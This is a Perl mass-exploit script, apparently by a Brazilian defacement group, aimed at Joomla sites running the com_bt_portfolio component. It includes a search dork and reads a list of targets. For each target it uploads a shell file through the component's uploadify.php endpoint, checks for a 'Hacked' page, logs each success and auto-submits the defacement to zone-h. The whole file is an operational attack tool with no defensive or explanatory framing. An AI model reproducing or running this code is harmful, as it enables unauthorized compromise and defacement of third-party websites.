joomla com_bt_portfolio

1. #!/usr/bin/perl
2. # Mass Exploiter & Auto Post Zone-h
3. # *** Brazilians hackers Team ***
4. # By ./ChmoD
5. # http://pastebin.com/u/brazilobscure1
6. # Youtube.com/BrazilObscure
7. # Modo De Usar ===> ./Exploit.pl
8. # Dork: inurl:/com_bt_portfolio
9.  
10. use HTTP::Request;
11. use LWP::Simple;
12. use HTTP::Request::Common;
13. $ua = LWP::UserAgent->new;
14.  
15.     print         "\n       ▒▒▒▒▒▒▒▓ \n";
16.         print        "      ▒▒▒▒▒▒▒▓▓▓ \n";
17.          print       "      ▒▓▓▓▓▓▓░░░▓ \n";
18.          print       "      ▒▓░░░░▓░░░░▓ \n";
19.          print       "      ▓░░░░░░▓░▓░▓ \n";
20.           print      "      ▓░░░░░░▓░░░▓ \n";
21.          print       "      ▓░░▓░░░▓▓▓▓ \n";
22.          print       "      ▒▓░░░░▓▒▒▒▒▓ \n";
23.          print       "      ▒▒▓▓▓▓▒▒▒▒▒▓ \n";
24.           print      "      ▒▒▒▒▒▒▒▒▓▓▓▓ \n";
25.          print       "      ▒▒▒▒▒▓▓▓▒▒▒▒▓ \n";
26.          print       "      ▒▒▒▒▓▒▒▒▒▒▒▒▒▓ \n";
27.          print       "      ▒▒▒▓▒▒▒▒▒▒▒▒▒▓ \n";
28.          print       "      ▒▒▓▒▒▒▒▒▒▒▒▒▒▒▓ \n";
29.          print       "      ▒▓▒▓▒▒▒▒▒▒▒▒▒▓ \n";
30.          print       "      ▒▓▒▓▓▓▓▓▓▓▓▓▓ \n";
31.          print       "      ▒▓▒▒▒▒▒▒▒▓ \n";
32.          print       "      ▒▒▓▒▒▒▒▒▓ \n";
33. print "\n\t[+] SUA LISTA : ";
34. $file=<STDIN>;
35. chomp($file);
36. open (file, "<$file") || die "\n[-] NAO FOI POSSIVEL ABRIR SUA LISTA !";
37. my @file = <file>;
38. close file;
39. foreach $webs (@file)
40. {
41. chomp $webs;
42. $site = $webs;
43. print  "\n[+] TESTANDO SITE --> $site\n";
44.  
45. $path = "/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php";
46. $site_vul = "http://".$site."".$path;
47. $res = $ua->request(POST $site_vul,
48. Content_Type => 'form-data',
49. Content => [
50. Filedata => ["up.phtml"], #NOME DA SUA SHELL
51. ],
52. );
53.  
54. $url = "http://".$site."/up.phtml"; #nome sua shell
55. $request = HTTP::Request->new(GET=>$url);
56. $useragent = LWP::UserAgent->new();
57. $response = $useragent->request($request);
58. $nullcracker = $response->content;
59. if ($nullcracker =~ /Hacked/){
60. print "[+] SUCESSO => $url\n";
61. zonpost();
62. open(BEN,">>resultado-$site.txt");
63. print BEN "$url\n";
64. close(BEN);
65. }else{
66. print "[-] EXPLOIT FALHOU ! \n";
67. }
68. }
69. sub zonpost{
70.  
71. $defacer="BrazilObscure";
72. $zn="http://zone-h.org/notify/single";
73. $lwp=LWP::UserAgent->new;
74. $res=$lwp -> post($zn,[
75. 'defacer' => $def,
76. 'domain1' => $url,
77. 'hackmode' => '1',
78. 'reason' => '1',
79. 'submit' => 'Send',
80. ]);
81. if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
82. print "[+] Zone-H => OK\n";
83. }
84. else
85. {
86. print "[-] Zone-H => Erro\n";
87. }
88.  
89. }